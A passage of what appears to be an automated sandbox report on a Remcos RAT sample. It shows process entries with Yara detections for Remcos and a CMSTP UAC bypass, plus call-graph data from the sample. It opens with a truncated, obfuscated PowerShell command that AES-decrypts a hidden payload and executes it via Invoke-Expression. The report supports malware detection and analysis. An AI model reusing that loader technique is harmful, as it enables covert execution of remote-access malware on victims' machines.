Rbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                                Imagebase:0x7ff741d30000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:07:32:04
                                Start date:27/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:07:32:09
                                Start date:27/07/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0xae0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                Reputation:high
                                Has exited:false

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:12
                                  Total number of Limit Nodes:0

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1368641186.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaaccc0000_powershell.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: d9a3b6c76c5f8501cb53ce46a00d11f7e76a86863ed48ff34510ac2ae972b5d1
                                  • Instruction ID: 0364bff41cf3b15a7c6a40a4ae2a46cff7cb6eff05afee7e74ddf24ab9a18d7a
                                  • Opcode Fuzzy Hash: d9a3b6c76c5f8501cb53ce46a00d11f7e76a86863ed48ff34510ac2ae972b5d1
                                  • Instruction Fuzzy Hash: 2FE12F70918A8D8FEBB8DF28C859BE977E1FF59301F10412AD80ED7291DF7496848B81

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1368641186.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaaccc0000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 0d3c2840d37860bfcb8372c8ee9abf8509e435dc5b6872f511408adc845ee4f0
                                  • Instruction ID: a509cca375ead8f277425ff8de6a4d1d1d1655705a3d1d929fb3ab2f46cbb64d
                                  • Opcode Fuzzy Hash: 0d3c2840d37860bfcb8372c8ee9abf8509e435dc5b6872f511408adc845ee4f0
                                  • Instruction Fuzzy Hash: CC613B70908A1D8FDB94DF68C885BE9BBF1FB69311F1082AAD44DE3251DB74A985CF40

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1368641186.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaaccc0000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 63ec140cea08b3302083318461d12016dfc15968a5049307a461ae5f85ffd86e
                                  • Instruction ID: ed2cf0945c6cca09ed60666ecf0380151a4a6a64d255896535107608a0e9060e
                                  • Opcode Fuzzy Hash: 63ec140cea08b3302083318461d12016dfc15968a5049307a461ae5f85ffd86e
                                  • Instruction Fuzzy Hash: 1A513970D08A4D8FEB54DFA8C849BEDBBF1FB59311F10826AD049E7256DB74A485CB40

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1368641186.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaaccc0000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 15113213d970650ec3488419b0b5693ed1fb869df06dd6d1f4a946df202cbc05
                                  • Instruction ID: 423ab1b58fa7800f27d59e8edd398150e79a57e8d68b04526d9a4694119d81e9
                                  • Opcode Fuzzy Hash: 15113213d970650ec3488419b0b5693ed1fb869df06dd6d1f4a946df202cbc05
                                  • Instruction Fuzzy Hash: 7A519E70D0874D8FDB55DFA8C845AEDBBF0EF56310F1081AAD449E7292DB74A486CB41

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1369457762.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaacd90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e474bec638681cf46d00917571b5e084e00ecfd5dfa346ebb15ff1f973b824be
                                  • Instruction ID: 552cf5134d3dd6f859ce17ecf7930c928903677705d15c2c257639bda3e11391
                                  • Opcode Fuzzy Hash: e474bec638681cf46d00917571b5e084e00ecfd5dfa346ebb15ff1f973b824be
                                  • Instruction Fuzzy Hash: DC613666B0FA87CFF7D9A76C48652B966C1EF86220B5941BAD06DC35D3FD0DD80882C1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 179 7ffaacd915b9-7ffaacd915f2 181 7ffaacd915f4-7ffaacd9160a 179->181 181->181 182 7ffaacd9160c-7ffaacd91621 181->182 183 7ffaacd91623-7ffaacd91627 182->183 184 7ffaacd91629-7ffaacd91715 182->184 183->184 197 7ffaacd9171d-7ffaacd91735 184->197
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1369457762.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaacd90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6985d49ac7749ebc12666cbd364bd328b1907733b1c374306c4ce8cf83b95647
                                  • Instruction ID: 5348bf45b7b199092770fafd9adfe6467e1a4cad0f7e8d19b7dc862da3f8e8e7
                                  • Opcode Fuzzy Hash: 6985d49ac7749ebc12666cbd364bd328b1907733b1c374306c4ce8cf83b95647
                                  • Instruction Fuzzy Hash: 3851BC96A0F3C68FE753577858681A13FB09F5726071E00EBD0D8CB5E3E80D880AC3A2

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1369457762.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaacd90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc173ed58bb623d1ecf36458352576f31ef86d13ff21b12fe1034d5c47a2d4b8
                                  • Instruction ID: 1ec9b8dc1df64a487a0364eb51b7e1efaacf2824823ade2e1b9e619cd1e510c4
                                  • Opcode Fuzzy Hash: bc173ed58bb623d1ecf36458352576f31ef86d13ff21b12fe1034d5c47a2d4b8
                                  • Instruction Fuzzy Hash: F241F556F0FA87CFF3D5A76C086527966C2EF86220B5941BAD46DC34D3FD0DD8084281

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1369457762.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaacd90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f04a499c1da6113db0b9f60effd26455c7e0f0d8344ad9dfb4a0767d58c8a4b
                                  • Instruction ID: 385b77d9e37aa7cba5693941bbc2345e772711b36002464d0f71f50484d4e833
                                  • Opcode Fuzzy Hash: 2f04a499c1da6113db0b9f60effd26455c7e0f0d8344ad9dfb4a0767d58c8a4b
                                  • Instruction Fuzzy Hash: 5C212833B0DA198FF7A5966CA4456F8B3D1EF85220B5442BBC41DC3686FD1EE80543C0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 308 7ffaacd93135-7ffaacd9313c 309 7ffaacd9315b 308->309 310 7ffaacd9313e-7ffaacd93159 308->310 312 7ffaacd93160-7ffaacd93169 309->312 310->309 314 7ffaacd93182-7ffaacd9318f 312->314 315 7ffaacd9316b-7ffaacd93178 312->315 315->314 317 7ffaacd9317a-7ffaacd93180 315->317 317->314
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1369457762.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaacd90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e853c93c9585f50f6c54235ec7c7e7bb68ec14c92f7e6f88038e3b8bc32b83
                                  • Instruction ID: aa58f0d8f3ccb5c1288d2623cb257eeb3aa62bc53db5f7118fa8e48375941c34
                                  • Opcode Fuzzy Hash: c1e853c93c9585f50f6c54235ec7c7e7bb68ec14c92f7e6f88038e3b8bc32b83
                                  • Instruction Fuzzy Hash: 04F046A6F0EE0A4FF7E9936C15092B891D3DF8422078885BBD01DE36A2FD1DDC0502C4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 319 7ffaacd933f1-7ffaacd93409 321 7ffaacd93410-7ffaacd93419 319->321 322 7ffaacd93432-7ffaacd9343f 321->322 323 7ffaacd9341b-7ffaacd93428 321->323 323->322 325 7ffaacd9342a-7ffaacd93430 323->325 325->322
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1369457762.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffaacd90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58fbf55326ff30cf5f7ad090348aaec97a69778abb5baae1598ad313aec0734f
                                  • Instruction ID: 660fc10dce46e58445fe13417d4daefb0d06c68674289a9c567de69afa2be26a
                                  • Opcode Fuzzy Hash: 58fbf55326ff30cf5f7ad090348aaec97a69778abb5baae1598ad313aec0734f
                                  • Instruction Fuzzy Hash: A3F05263F0D99D4AB3A6929CA4062F862C1CF8427078942BBC45CC3782EC0DDC0503C0

                                  Execution Graph

                                  Execution Coverage:4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:5.4%
                                  Total number of Nodes:1339
                                  Total number of Limit Nodes:51
                                  execution_graph 47258 434887 47259 434893 ___DestructExceptionObject 47258->47259 47285 434596 47259->47285 47261 43489a 47263 4348c3 47261->47263 47583 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47261->47583 47271 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47263->47271 47584 444251 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47263->47584 47265 4348dc 47266 4348e2 ___DestructExceptionObject 47265->47266 47585 4441f5 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47265->47585 47268 434962 47296 434b14 47268->47296 47271->47268 47586 4433e7 36 API calls 4 library calls 47271->47586 47278 434984 47279 43498e 47278->47279 47588 44341f 28 API calls _Atexit 47278->47588 47280 434997 47279->47280 47589 4433c2 28 API calls _Atexit 47279->47589 47590 43470d 13 API calls 2 library calls 47280->47590 47284 43499f 47284->47266 47286 43459f 47285->47286 47591 434c52 IsProcessorFeaturePresent 47286->47591 47288 4345ab 47592 438f31 10 API calls 4 library calls 47288->47592 47290 4345b0 47295 4345b4 47290->47295 47593 4440bf 47290->47593 47293 4345cb 47293->47261 47295->47261 47665 436e90 47296->47665 47299 434968 47300 4441a2 47299->47300 47667 44f059 47300->47667 47302 434971 47305 40e9c5 47302->47305 47303 4441ab 47303->47302 47671 446815 36 API calls 47303->47671 47673 41cb50 LoadLibraryA GetProcAddress 47305->47673 47307 40e9e1 GetModuleFileNameW 47678 40f3c3 47307->47678 47309 40e9fd 47693 4020f6 47309->47693 47312 4020f6 28 API calls 47313 40ea1b 47312->47313 47699 41be1b 47313->47699 47317 40ea2d 47725 401e8d 47317->47725 47319 40ea36 47320 40ea93 47319->47320 47321 40ea49 47319->47321 47731 401e65 47320->47731 47999 40fbb3 118 API calls 47321->47999 47324 40eaa3 47328 401e65 22 API calls 47324->47328 47325 40ea5b 47326 401e65 22 API calls 47325->47326 47327 40ea67 47326->47327 48000 410f37 36 API calls __EH_prolog 47327->48000 47329 40eac2 47328->47329 47736 40531e 47329->47736 47332 40ead1 47741 406383 47332->47741 47333 40ea79 48001 40fb64 78 API calls 47333->48001 47336 40ea82 48002 40f3b0 71 API calls 47336->48002 47343 401fd8 11 API calls 47345 40eefb 47343->47345 47344 401fd8 11 API calls 47346 40eafb 47344->47346 47587 4432f6 GetModuleHandleW 47345->47587 47347 401e65 22 API calls 47346->47347 47348 40eb04 47347->47348 47758 401fc0 47348->47758 47350 40eb0f 47351 401e65 22 API calls 47350->47351 47352 40eb28 47351->47352 47353 401e65 22 API calls 47352->47353 47354 40eb43 47353->47354 47355 40ebae 47354->47355 48003 406c1e 47354->48003 47357 401e65 22 API calls 47355->47357 47362 40ebbb 47357->47362 47358 40eb70 47359 401fe2 28 API calls 47358->47359 47360 40eb7c 47359->47360 47363 401fd8 11 API calls 47360->47363 47361 40ec02 47762 40d069 47361->47762 47362->47361 47368 413549 3 API calls 47362->47368 47364 40eb85 47363->47364 48008 413549 RegOpenKeyExA 47364->48008 47366 40ec08 47367 40ea8b 47366->47367 47765 41b2c3 47366->47765 47367->47343 47374 40ebe6 47368->47374 47372 40ec23 47375 40ec76 47372->47375 47782 407716 47372->47782 47373 40f34f 48091 4139a9 30 API calls 47373->48091 47374->47361 48011 4139a9 30 API calls 47374->48011 47378 401e65 22 API calls 47375->47378 47381 40ec7f 47378->47381 47380 40f365 48092 412475 65 API calls ___scrt_get_show_window_mode 47380->48092 47389 40ec90 47381->47389 47390 40ec8b 47381->47390 47384 40ec42 48012 407738 30 API calls 47384->48012 47385 40ec4c 47386 401e65 22 API calls 47385->47386 47399 40ec55 47386->47399 47387 40f36f 47392 41bc5e 28 API calls 47387->47392 47395 401e65 22 API calls 47389->47395 48015 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47390->48015 47391 40ec47 48013 407260 98 API calls 47391->48013 47396 40f37f 47392->47396 47397 40ec99 47395->47397 47891 413a23 RegOpenKeyExW 47396->47891 47786 41bc5e 47397->47786 47399->47375 47403 40ec71 47399->47403 47400 40eca4 47790 401f13 47400->47790 48014 407260 98 API calls 47403->48014 47407 401f09 11 API calls 47409 40f39c 47407->47409 47411 401f09 11 API calls 47409->47411 47413 40f3a5 47411->47413 47412 401e65 22 API calls 47414 40ecc1 47412->47414 47894 40dd42 47413->47894 47419 401e65 22 API calls 47414->47419 47418 40f3af 47420 40ecdb 47419->47420 47421 401e65 22 API calls 47420->47421 47422 40ecf5 47421->47422 47423 401e65 22 API calls 47422->47423 47424 40ed0e 47423->47424 47426 401e65 22 API calls 47424->47426 47456 40ed7b 47424->47456 47425 40ed8a 47427 40ed93 47425->47427 47455 40ee0f ___scrt_get_show_window_mode 47425->47455 47431 40ed23 _wcslen 47426->47431 47428 401e65 22 API calls 47427->47428 47429 40ed9c 47428->47429 47432 401e65 22 API calls 47429->47432 47430 40ef06 ___scrt_get_show_window_mode 48076 4136f8 RegOpenKeyExA 47430->48076 47433 401e65 22 API calls 47431->47433 47431->47456 47434 40edae 47432->47434 47435 40ed3e 47433->47435 47437 401e65 22 API calls 47434->47437 47438 401e65 22 API calls 47435->47438 47439 40edc0 47437->47439 47440 40ed53 47438->47440 47442 401e65 22 API calls 47439->47442 48016 40da34 47440->48016 47441 40ef51 47443 401e65 22 API calls 47441->47443 47444 40ede9 47442->47444 47445 40ef76 47443->47445 47449 401e65 22 API calls 47444->47449 47812 402093 47445->47812 47448 401f13 28 API calls 47451 40ed72 47448->47451 47452 40edfa 47449->47452 47454 401f09 11 API calls 47451->47454 48074 40cdf9 45 API calls _wcslen 47452->48074 47453 40ef88 47818 41376f RegCreateKeyA 47453->47818 47454->47456 47802 413947 47455->47802 47456->47425 47456->47430 47460 40eea3 ctype 47465 401e65 22 API calls 47460->47465 47461 40ee0a 47461->47455 47463 401e65 22 API calls 47464 40efaa 47463->47464 47824 43baac 47464->47824 47466 40eeba 47465->47466 47466->47441 47470 40eece 47466->47470 47469 40efc1 48079 41cd9b 87 API calls ___scrt_get_show_window_mode 47469->48079 47472 401e65 22 API calls 47470->47472 47471 40efe4 47476 402093 28 API calls 47471->47476 47474 40eed7 47472->47474 47477 41bc5e 28 API calls 47474->47477 47475 40efc8 CreateThread 47475->47471 48859 41d45d 10 API calls 47475->48859 47478 40eff9 47476->47478 47479 40eee3 47477->47479 47480 402093 28 API calls 47478->47480 48075 40f474 104 API calls 47479->48075 47483 40f008 47480->47483 47482 40eee8 47482->47441 47485 40eeef 47482->47485 47828 41b4ef 47483->47828 47485->47367 47487 401e65 22 API calls 47488 40f019 47487->47488 47489 401e65 22 API calls 47488->47489 47490 40f02b 47489->47490 47491 401e65 22 API calls 47490->47491 47492 40f04b 47491->47492 47493 43baac _strftime 40 API calls 47492->47493 47494 40f058 47493->47494 47495 401e65 22 API calls 47494->47495 47496 40f063 47495->47496 47497 401e65 22 API calls 47496->47497 47498 40f074 47497->47498 47499 401e65 22 API calls 47498->47499 47500 40f089 47499->47500 47501 401e65 22 API calls 47500->47501 47502 40f09a 47501->47502 47503 40f0a1 StrToIntA 47502->47503 47852 409de4 47503->47852 47506 401e65 22 API calls 47507 40f0bc 47506->47507 47508 40f101 47507->47508 47509 40f0c8 47507->47509 47512 401e65 22 API calls 47508->47512 48080 4344ea 47509->48080 47513 40f111 47512->47513 47516 40f159 47513->47516 47517 40f11d 47513->47517 47514 401e65 22 API calls 47515 40f0e4 47514->47515 47518 40f0eb CreateThread 47515->47518 47520 401e65 22 API calls 47516->47520 47519 4344ea new 22 API calls 47517->47519 47518->47508 48863 419fb4 103 API calls 2 library calls 47518->48863 47521 40f126 47519->47521 47522 40f162 47520->47522 47523 401e65 22 API calls 47521->47523 47525 40f1cc 47522->47525 47526 40f16e 47522->47526 47524 40f138 47523->47524 47528 40f13f CreateThread 47524->47528 47529 401e65 22 API calls 47525->47529 47527 401e65 22 API calls 47526->47527 47531 40f17e 47527->47531 47528->47516 48862 419fb4 103 API calls 2 library calls 47528->48862 47530 40f1d5 47529->47530 47532 40f1e1 47530->47532 47533 40f21a 47530->47533 47534 401e65 22 API calls 47531->47534 47536 401e65 22 API calls 47532->47536 47877 41b60d GetComputerNameExW GetUserNameW 47533->47877 47537 40f193 47534->47537 47539 40f1ea 47536->47539 48087 40d9e8 31 API calls 47537->48087 47544 401e65 22 API calls 47539->47544 47540 401f13 28 API calls 47541 40f22e 47540->47541 47543 401f09 11 API calls 47541->47543 47546 40f237 47543->47546 47547 40f1ff 47544->47547 47545 40f1a6 47548 401f13 28 API calls 47545->47548 47549 40f240 SetProcessDEPPolicy 47546->47549 47550 40f243 CreateThread 47546->47550 47557 43baac _strftime 40 API calls 47547->47557 47551 40f1b2 47548->47551 47549->47550 47552 40f264 47550->47552 47553 40f258 CreateThread 47550->47553 48831 40f7a7 47550->48831 47554 401f09 11 API calls 47551->47554 47555 40f279 47552->47555 47556 40f26d CreateThread 47552->47556 47553->47552 48858 4120f7 138 API calls 47553->48858 47558 40f1bb CreateThread 47554->47558 47560 40f2cc 47555->47560 47562 402093 28 API calls 47555->47562 47556->47555 48860 4126db 38 API calls ___scrt_get_show_window_mode 47556->48860 47559 40f20c 47557->47559 47558->47525 48861 401be9 50 API calls _strftime 47558->48861 48088 40c162 7 API calls 47559->48088 47888 4134ff RegOpenKeyExA 47560->47888 47563 40f29c 47562->47563 48089 4052fd 28 API calls 47563->48089 47569 40f2ed 47571 41bc5e 28 API calls 47569->47571 47572 40f2fd 47571->47572 48090 41361b 31 API calls 47572->48090 47577 40f313 47578 401f09 11 API calls 47577->47578 47581 40f31e 47578->47581 47579 40f346 DeleteFileW 47580 40f34d 47579->47580 47579->47581 47580->47387 47581->47387 47581->47579 47582 40f334 Sleep 47581->47582 47582->47581 47583->47261 47584->47265 47585->47271 47586->47268 47587->47278 47588->47279 47589->47280 47590->47284 47591->47288 47592->47290 47597 44fb68 47593->47597 47596 438f5a 8 API calls 3 library calls 47596->47295 47600 44fb85 47597->47600 47601 44fb81 47597->47601 47599 4345bd 47599->47293 47599->47596 47600->47601 47603 449ca6 47600->47603 47615 434fcb 47601->47615 47604 449cb2 ___DestructExceptionObject 47603->47604 47622 445888 EnterCriticalSection 47604->47622 47606 449cb9 47623 450183 47606->47623 47608 449cc8 47614 449cd7 47608->47614 47634 449b3a 23 API calls 47608->47634 47611 449cd2 47635 449bf0 GetStdHandle GetFileType 47611->47635 47612 449ce8 ___DestructExceptionObject 47612->47600 47636 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47614->47636 47616 434fd6 IsProcessorFeaturePresent 47615->47616 47617 434fd4 47615->47617 47619 435018 47616->47619 47617->47599 47664 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47619->47664 47621 4350fb 47621->47599 47622->47606 47624 45018f ___DestructExceptionObject 47623->47624 47625 4501b3 47624->47625 47626 45019c 47624->47626 47637 445888 EnterCriticalSection 47625->47637 47645 4405dd 20 API calls __dosmaperr 47626->47645 47629 4501eb 47646 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47629->47646 47630 4501bf 47630->47629 47638 4500d4 47630->47638 47632 4501a1 pre_c_initialization ___DestructExceptionObject 47632->47608 47634->47611 47635->47614 47636->47612 47637->47630 47647 445af3 47638->47647 47640 4500f3 47655 446782 47640->47655 47643 450145 47643->47630 47644 4500e6 47644->47640 47654 448a84 11 API calls 2 library calls 47644->47654 47645->47632 47646->47632 47648 445b00 __Getctype 47647->47648 47649 445b2b RtlAllocateHeap 47648->47649 47650 445b40 47648->47650 47661 442f80 7 API calls 2 library calls 47648->47661 47649->47648 47652 445b3e 47649->47652 47662 4405dd 20 API calls __dosmaperr 47650->47662 47652->47644 47654->47644 47656 44678d RtlFreeHeap 47655->47656 47657 4467b6 _free 47655->47657 47656->47657 47658 4467a2 47656->47658 47657->47643 47663 4405dd 20 API calls __dosmaperr 47658->47663 47660 4467a8 GetLastError 47660->47657 47661->47648 47662->47652 47663->47660 47664->47621 47666 434b27 GetStartupInfoW 47665->47666 47666->47299 47668 44f06b 47667->47668 47669 44f062 47667->47669 47668->47303 47672 44ef58 49 API calls 4 library calls 47669->47672 47671->47303 47672->47668 47674 41cb8f LoadLibraryA GetProcAddress 47673->47674 47675 41cb7f GetModuleHandleA GetProcAddress 47673->47675 47676 41cbb8 44 API calls 47674->47676 47677 41cba8 LoadLibraryA GetProcAddress 47674->47677 47675->47674 47676->47307 47677->47676 48093 41b4a8 FindResourceA 47678->48093 47682 40f3ed _Yarn 48103 4020b7 47682->48103 47685 401fe2 28 API calls 47686 40f413 47685->47686 47687 401fd8 11 API calls 47686->47687 47688 40f41c 47687->47688 47689 43bd51 _Yarn 21 API calls 47688->47689 47690 40f42d _Yarn 47689->47690 48109 406dd8 47690->48109 47692 40f460 47692->47309 47694 40210c 47693->47694 47695 4023ce 11 API calls 47694->47695 47696 402126 47695->47696 47697 402569 28 API calls 47696->47697 47698 402134 47697->47698 47698->47312 48146 4020df 47699->48146 47701 41be2e 47705 41bea0 47701->47705 47713 401fe2 28 API calls 47701->47713 47715 401fd8 11 API calls 47701->47715 47720 41be9e 47701->47720 48150 4041a2 47701->48150 48153 41ce34 47701->48153 47702 401fd8 11 API calls 47703 41bed0 47702->47703 47704 401fd8 11 API calls 47703->47704 47706 41bed8 47704->47706 47707 4041a2 28 API calls 47705->47707 47709 401fd8 11 API calls 47706->47709 47710 41beac 47707->47710 47711 40ea24 47709->47711 47712 401fe2 28 API calls 47710->47712 47721 40fb17 47711->47721 47714 41beb5 47712->47714 47713->47701 47716 401fd8 11 API calls 47714->47716 47715->47701 47717 41bebd 47716->47717 47718 41ce34 28 API calls 47717->47718 47718->47720 47720->47702 47722 40fb23 47721->47722 47724 40fb2a 47721->47724 48195 402163 11 API calls 47722->48195 47724->47317 47726 402163 47725->47726 47730 40219f 47726->47730 48196 402730 11 API calls 47726->48196 47728 402184 48197 402712 11 API calls std::_Deallocate 47728->48197 47730->47319 47732 401e6d 47731->47732 47733 401e75 47732->47733 48198 402158 22 API calls 47732->48198 47733->47324 47737 4020df 11 API calls 47736->47737 47738 40532a 47737->47738 48199 4032a0 47738->48199 47740 405346 47740->47332 48204 4051ef 47741->48204 47743 406391 48208 402055 47743->48208 47746 401fe2 47747 401ff1 47746->47747 47754 402039 47746->47754 47748 4023ce 11 API calls 